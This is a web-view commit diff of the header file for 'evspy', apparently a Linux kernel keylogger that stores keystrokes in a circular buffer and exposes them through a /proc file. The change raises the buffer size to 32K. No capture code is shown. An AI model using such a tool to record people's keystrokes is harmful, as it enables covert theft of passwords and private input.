aboutsummaryrefslogtreecommitdiff
path: root/evspy.h
diff options
context:
space:
mode:
Diffstat (limited to 'evspy.h')
-rw-r--r--evspy.h8
1 files changed, 4 insertions, 4 deletions
diff --git a/evspy.h b/evspy.h
index eeaa0fc..3621cba 100644
--- a/evspy.h
+++ b/evspy.h
@@ -41,10 +41,10 @@
#define EVS_KLAY_EN 0
#define EVS_KLAY_ES 1
-#define EVS_NAME "evspy" // driver name
-#define EVS_KLAY EVS_KLAY_ES // change this to your keyboard layout
-#define EVS_TROLL 1 // clear this if you're a serious guy
-#define EVS_BUFSIZE PAGE_SIZE // size of the circular buffer (4K)
+#define EVS_NAME "evspy" // driver name
+#define EVS_KLAY EVS_KLAY_ES // change this to your keyboard layout
+#define EVS_TROLL 1 // clear this if you're a serious guy
+#define EVS_BUFSIZE (1<<15) // 32K // size of the circular buffer
#define EVS_PROCNAME "driver/" EVS_NAME // virtual file within /proc
#include "maps/maps.h"